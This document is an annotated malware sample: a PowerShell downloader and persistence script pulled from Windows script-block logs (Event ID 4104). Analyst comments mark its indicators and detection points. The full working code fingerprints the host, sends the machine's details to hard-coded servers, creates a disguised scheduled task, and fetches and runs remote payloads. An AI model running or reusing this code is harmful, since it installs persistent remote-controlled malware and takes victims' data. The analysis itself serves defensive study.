- # Extracted from EventViewer (Event ID: 4104)
- # Analyst notes (defensive): this script block is a downloader / persistence stage.
- # It fingerprints the host, registers a scheduled task on first run, checks in to a
- # hard-coded address and spawns hidden PowerShell children that fetch further stages.
- # The comments below describe only what the visible code does; the payloads fetched
- # from the URLs in this script are not on this page.
- #
- # --- Host fingerprinting: MAC address and installed AV product names ---------------
- [string]$av = ""
- [string]$avs = ""
- # First data row of `getmac /FO CSV`, column 1 = physical address.
- [string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
- # AV display names from the SecurityCenter2 WMI namespace (WMI query is a detection point).
- $avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
- # More than one AV product comes back as an array; join the names with '|'.
- if($avs.GetType().name.IndexOf('Object') -gt -1){
- for($v = 0; $v -lt $avs.Count; $v++){
- $av += $avs[$v] + "|"
- }
- }else{
- $av = $avs
- }
- # Appends the tag 'ZDFY' when a service named 'zhudongfangyu' is running; errors are swallowed.
- try{
- if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
- $av += 'ZDFY'
- }
- }catch{}
- # Restricts the MAC to hex digits and dashes (it is reused below as a task name and URL parameter);
- # anything else is replaced by an all-zero placeholder.
- if(-not ($mac -match '^[\da-fA-F-]*$')){
- [string]$mac = "00-00-00-00-00-00"
- }else{}
- # Random delay of 20 s to ~6.7 min before any persistence or network activity
- # (presumably to outlast short analysis windows). Detection note: a long Sleep
- # immediately after host enumeration in a 4104 script block.
- [System.Threading.Thread]::Sleep((Get-Random -Minimum 20000 -Maximum 400000))
- # $permit is $true when the current identity holds the Administrator role; it selects
- # the SYSTEM vs. current-user scheduled-task branch further down.
- $permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
- $status = '|'
- # Run-once marker files in %TEMP% (host IoCs): kkk1.log gates the persistence step,
- # kill.log gates the final powershell kill. $flag/$flag2 hold the strings 'True'/'False'.
- $path = "$env:temp\\kkk1.log"
- [string]$flag = test-path $path
- $path2 = "$env:temp\\kill.log"
- [string]$flag2 = test-path $path2
- # Single-instance guards: named mutexes 'Global\powerv5' and 'Global\powerdv5' (host IoCs).
- # The [ref] argument receives the Mutex constructor's createdNew result, so $psflag /
- # $dflag are $true only in the instance that created the mutex; they gate the two
- # Start-Process launches below. ($flase is not a defined variable, so the value is
- # $null until the constructor assigns it; if the constructor throws it stays $null.)
- try{
- $name = 'Global\powerv5'
- $psflag = $flase
- New-Object System.Threading.Mutex ($true,$name,[ref]$psflag)
- }catch{}
- try{
- $name2 = 'Global\powerdv5'
- $dflag = $flase
- New-Object System.Threading.Mutex ($true,$name2,[ref]$dflag)
- }catch{}
- # Date stamp (yyMMdd) appended to the first-stage URL path below.
- $dt = Get-Date -Format 'yyMMdd'
- # Beacon query string: MAC, AV list, OS version and architecture, first-run flag, domain,
- # username and the mutex result. Detection note: this fixed parameter set
- # (mac/av/version/bit/flag2/domain/user/PS) is a stable network signature.
- $key = "&mac="+$mac+"&av="+$av+"&version="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&PS=" + $psflag
- # --- Persistence (first run only, i.e. kkk1.log absent) ---------------------------
- # Creates the marker, then registers a scheduled task that runs every 45 minutes from
- # 07:00 and executes a base64 (UTF-16LE, `-e`) PowerShell one-liner which downloads and
- # IEX-executes the next stage from v.y6h.net.
- if($flag -eq 'False'){
- New-Item $path -type file
- try{
- if($permit){
- $status += 'PHig|'
- # Admin branch: task runs as SYSTEM, named after the MAC under the \Microsoft\windows\
- # task folder (looks like a built-in task). Stage URL: http://v.y6h.net/g?h<yyMMdd>.
- $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h" + $dt + "')"
- $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
- $bcode = [Convert]::ToBase64String($Bytes)
- # `schtasks /query ... || schtasks /create ...`: create only if the task does not exist yet.
- # Detection note: schtasks /create whose /tr contains "powershell -nop -ep bypass -e".
- $ccc = 'schtasks /query /tn "\Microsoft\windows\' + $mac + '" || schtasks /create /ru system /sc MINUTE /mo 45 /st 07:00:00 /tn "\Microsoft\windows\' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
- &cmd.exe /c $ccc
- }else{
- $status += 'PLow|'
- # Non-admin branch: same task as the current user, task name is the MAC alone.
- # Stage URL: http://v.y6h.net/g?l<yyMMdd>.
- $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?l" + $dt + "')"
- $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
- $bcode = [Convert]::ToBase64String($Bytes)
- $ccc = 'schtasks /query /tn "' + $mac + '" || schtasks /create /sc MINUTE /mo 45 /st 07:00:00 /tn "' + $mac + '" /tr "powershell -nop -ep bypass -e ' + $bcode +'" /F'
- &cmd.exe /c $ccc
- }
- }catch{}
- }else{}
- # --- Check-in ------------------------------------------------------------------
- # Sends the fingerprint, the status tags and this script's own path
- # ($MyInvocation.MyCommand.Definition) to a hard-coded IP and executes whatever
- # comes back. Detection note: outbound HTTP to 27.102.107.137/status.json from powershell.
- try{
- $download = 'http://27.102.107.137/status.json?allv6' + $key + "&" + $status + "&" + $MyInvocation.MyCommand.Definition
- IEX (New-Object Net.WebClient).DownloadString("$download")
- }catch{}
- # --- Second stage: hidden PowerShell children launched through cmd.exe ----------
- # Only the instance that created the 'Global\powerv5' mutex launches this one;
- # it downloads and executes http://down.bddp.net/newol.dat (with the same query string).
- # Detection note: cmd.exe spawning "powershell -nop -w hidden -ep bypass -c IEX ...".
- try{
- if($psflag){
- $onps = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/newol.dat?allv6" + $key + "')" + '"'
- Start-Process -FilePath cmd.exe -ArgumentList "$onps"
- }else{}
- }catch{}
- # Picks a 64-bit or 32-bit payload (d64.dat / d32.dat) by the process pointer size;
- # launched only by the instance that created the 'Global\powerdv5' mutex.
- try{
- if([IntPtr]::Size -eq 8){
- $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d64.dat?allv6" + $key + "')" + '"'
- }else{
- $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d32.dat?allv6" + $key + "')" + '"'
- }
- if($dflag){
- Start-Process -FilePath cmd.exe -ArgumentList "$dglink"
- }else{}
- }catch{}
- # --- Cleanup ------------------------------------------------------------------
- # After 3 s, on the first run of this step (kill.log absent) it creates the marker and
- # force-kills every process named powershell, this one included. Detection note:
- # Stop-Process -Force -processname powershell in a 4104 block.
- [System.Threading.Thread]::Sleep(3000)
- if($flag2 -eq 'False'){
- New-Item $path2 -type file
- Stop-Process -Force -processname powershell
- }else{}